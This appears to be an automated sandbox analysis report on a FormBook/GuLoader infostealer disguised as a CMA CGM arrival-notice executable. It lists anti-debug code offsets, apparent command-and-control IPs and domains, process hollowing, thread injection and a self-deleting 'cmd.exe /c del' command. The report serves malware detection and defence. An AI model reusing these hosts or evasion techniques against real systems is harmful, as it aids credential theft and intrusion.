      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E68A537 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E609100 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E60B1E1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E6941E8 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E61D5E0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E6B8DF1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E6335A1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E6361A0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E631DB5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E62C182 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E63A185 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E602D8A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E63FD9B mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04869080 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_048E3884 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0487849B mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_048A90AF mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0489F0BF mov ecx, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0489F0BF mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04938CD6 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_048FB8D0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_048FB8D0 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_049214FB mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_048E6CF0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_048E6C0A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04934015 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04921C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_048E7016 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0493740D mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0489002D mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0489BC2C mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0487B02A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0489A44B mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04880050 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_048FC450 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04922073 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0488746D mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04931074 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0488C182 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0489A185 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04862D8A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0489FD9B mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04892990 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_048935A1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_048E69A6 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_048961A0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_048E51BE mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04891DB5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04891DB5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04918DF1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0486B1E1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0486B1E1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0486B1E1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_048F41E8 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0487D5E0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0487D5E0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04869100 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04869100 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04869100 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04938D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04884120 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04884120 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04884120 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04884120 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04884120 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04894D3B mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04894D3B mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04894D3B mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0489513A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0489513A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04873D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04873D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04873D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04873D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04873D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04873D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04873D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04873D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04873D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04873D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04873D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04873D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04873D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0486AD30 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_048EA537 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_048A3D43 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0488B944 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0488B944 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_048E3540 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04887D50 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0486C962 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0486B171 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0486B171 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0488C577 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0488C577 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_048FFE87 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0489D294 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0489D294 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_048652A5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_048652A5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_048652A5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_048652A5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_048652A5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_048E46A7 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04930EA5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04930EA5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04930EA5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0487AAB0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0487AAB0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0489FAB0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04892ACB mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04938ED6 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_048936CC mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_048A8EC7 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0491FEC0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_048776E2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_048916E0 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04892AE4 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0486C600 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0486C600 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0486C600 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04898E00 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04878A0A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0486AA16 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0486AA16 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04883A1C mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0489A61C mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0489A61C mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0486E620 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0491FE3F mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04869240 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04869240 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04869240 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04869240 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04877E41 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04877E41 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04877E41 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04877E41 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04877E41 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04877E41 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_048F4257 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0487766D mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_048A927A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0491B260 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0491B260 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04938A62 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0488AE73 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0488AE73 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0488AE73 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0488AE73 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0488AE73 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04871B8F mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04871B8F mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0491D380 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04878794 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0492138A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0489B390 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_048E7794 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_048E7794 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_048E7794 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04935BA5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_048E53CA mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_048E53CA mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_048903E2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_048903E2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_048903E2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_048903E2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_048903E2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_048903E2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_048A37F5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0489A70E mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0489A70E mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0492131B mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0493070D mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0493070D mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0488F716 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_048FFF10 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_048FFF10 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04864F2E mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04864F2E mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0489E730 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0486DB40 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0487EF40 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04938B58 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0486F358 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0486DB60 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0487FF60 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04893B7A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04893B7A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04938F6A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeProcess queried: DebugPort
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeProcess queried: DebugPort
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeProcess queried: DebugPort
      Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPort
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_0078CE61 LdrInitializeThunk,

      HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)
      Source: C:\Windows\explorer.exeNetwork Connect: 209.99.40.222 80
      Source: C:\Windows\explorer.exeNetwork Connect: 142.111.236.6 80
      Source: C:\Windows\explorer.exeDomain query: www.microsoftjob.com
      Source: C:\Windows\explorer.exeNetwork Connect: 160.153.136.3 80
      Source: C:\Windows\explorer.exeDomain query: www.wxsjykj.com
      Source: C:\Windows\explorer.exeDomain query: www.everythingswallow.com
      Source: C:\Windows\explorer.exeDomain query: www.acooll.com
      Source: C:\Windows\explorer.exeNetwork Connect: 44.227.76.166 80
      Source: C:\Windows\explorer.exeDomain query: www.priorpublic.com
      Source: C:\Windows\explorer.exeNetwork Connect: 91.195.240.117 80
      Source: C:\Windows\explorer.exeNetwork Connect: 54.65.172.3 80
      Source: C:\Windows\explorer.exeDomain query: www.taylormakeyourlife.com
      Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80
      Source: C:\Windows\explorer.exeDomain query: www.beckyhartpcpublishers.com
      Source: C:\Windows\explorer.exeDomain query: www.rlmwebcreations.com
      Source: C:\Windows\explorer.exeDomain query: www.dominionhavanese.com
Sample uses process hollowing technique
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeSection unmapped: C:\Windows\SysWOW64\rundll32.exe base address: 10E0000
Maps a DLL or memory area into another process
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeSection loaded: unknown target: C:\Windows\SysWOW64\rundll32.exe protection: execute and read and write
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeSection loaded: unknown target: C:\Windows\SysWOW64\rundll32.exe protection: execute and read and write
      Source: C:\Windows\SysWOW64\rundll32.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
      Source: C:\Windows\SysWOW64\rundll32.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Queues an APC in another process (thread injection)
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeThread APC queued: target process: C:\Windows\explorer.exe
Modifies the context of a thread in another process (thread injection)
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeThread register set: target process: 3424
      Source: C:\Windows\SysWOW64\rundll32.exeThread register set: target process: 3424
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeProcess created: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe 'C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe'
      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe'
      Source: explorer.exe, 0000000D.00000000.1212057520.0000000000AD8000.00000004.00000020.sdmpBinary or memory string: ProgmanMD6
      Source: explorer.exe, 0000000D.00000000.1232778111.0000000001080000.00000002.00020000.sdmp, rundll32.exe, 0000000E.00000002.1746282268.0000000003100000.00000002.00020000.sdmpBinary or memory string: Program Manager
      Source: explorer.exe, 0000000D.00000000.1232778111.0000000001080000.00000002.00020000.sdmp, rundll32.exe, 0000000E.00000002.1746282268.0000000003100000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
      Source: explorer.exe, 0000000D.00000000.1232778111.0000000001080000.00000002.00020000.sdmp, rundll32.exe, 0000000E.00000002.1746282268.0000000003100000.00000002.00020000.sdmpBinary or memory string: Progman
      Source: explorer.exe, 0000000D.00000000.1232778111.0000000001080000.00000002.00020000.sdmp, rundll32.exe, 0000000E.00000002.1746282268.0000000003100000.00000002.00020000.sdmpBinary or memory string: Progmanlock
      Source: explorer.exe, 0000000D.00000000.1243122844.000000000A716000.00000004.00000001.sdmpBinary or memory string: Shell_TrayWnd5D

      Stealing of Sensitive Information:

Yara detected Generic Dropper
      Source: Yara matchFile source: Process Memory Space: NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe PID: 6396, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 5228, type: MEMORYSTR
Yara detected FormBook
      Source: Yara matchFile source: 0000000C.00000002.1258337207.00000000000A0000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000E.00000002.1744958474.0000000000B20000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000D.00000000.1239560173.000000000690A000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000C.00000002.1261762873.000000001E2B0000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000E.00000002.1745033505.0000000000B50000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000E.00000002.1744536176.0000000000800000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000D.00000000.1216786397.000000000690A000.00000040.00020000.sdmp, type: MEMORY
GuLoader behavior detected
      Source: Initial fileSignature Results: GuLoader behavior

      Remote Access Functionality:

Yara detected FormBook
      Source: Yara matchFile source: 0000000C.00000002.1258337207.00000000000A0000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000E.00000002.1744958474.0000000000B20000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000D.00000000.1239560173.000000000690A000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000C.00000002.1261762873.000000001E2B0000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000E.00000002.1745033505.0000000000B50000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000E.00000002.1744536176.0000000000800000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000D.00000000.1216786397.000000000690A000.00000040.00020000.sdmp, type: MEMORY

      Mitre Att&ck Matrix

Numbers in parentheses are the count of matched signatures for that technique.

